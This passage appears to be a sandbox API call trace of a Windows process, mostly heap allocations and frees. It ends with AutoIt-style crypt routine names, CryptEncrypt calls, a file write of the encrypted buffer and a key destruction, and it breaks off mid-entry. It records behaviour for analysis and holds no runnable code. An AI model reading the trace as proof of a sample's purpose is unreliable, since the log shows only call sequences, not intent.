(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0079.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0079.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0079.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0079.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0079.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0079.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.897] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0079.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0079.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.898] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.898] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0079.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0079.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.900] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.900] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.900] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.900] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0079.901] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0079.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.901] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.901] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.901] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb150, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.901] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x2237, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x2240) returned 1 [0079.902] CharLowerBuffW (in: lpsz="byte[8769]", cchLength=0xa | out: lpsz="byte[8769]") returned 0xa [0079.902] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb468, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.902] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49a06c8*, pdwDataLen=0x144e2e0*=0x2237, dwBufLen=0x2240 | out: pbData=0x49a06c8*, pdwDataLen=0x144e2e0*=0x2240) returned 1 [0079.902] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.902] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.902] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.902] WriteFile (in: hFile=0x298, lpBuffer=0x499c250*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x499c250*, lpNumberOfBytesWritten=0x144ece4*=0x2240, lpOverlapped=0x0) returned 1 [0079.904] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cae08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.904] CryptDestroyKey (hKey=0x41ac600) returned 1 [0079.904] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.904] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.905] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: 